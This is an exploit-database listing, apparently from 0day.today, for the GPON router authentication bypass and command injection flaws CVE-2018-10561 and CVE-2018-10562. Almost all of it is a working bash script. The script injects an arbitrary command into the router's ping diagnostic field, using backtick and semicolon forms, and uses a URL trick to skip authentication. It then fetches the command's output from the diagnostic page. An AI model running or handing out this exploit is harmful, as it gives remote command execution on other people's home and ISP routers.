[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GPON Routers - Authentication Bypass / Command Injection Exploit

Author
vpnmentor
Risk
[
Security Risk High
]
0day-ID
0day-ID-30298
Category
remote exploits
Date add
03-05-2018
CVE
CVE-2018-10561
CVE-2018-10562
Platform
hardware
#!/bin/bash
 
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’

#  0day.today [2024-06-16]  #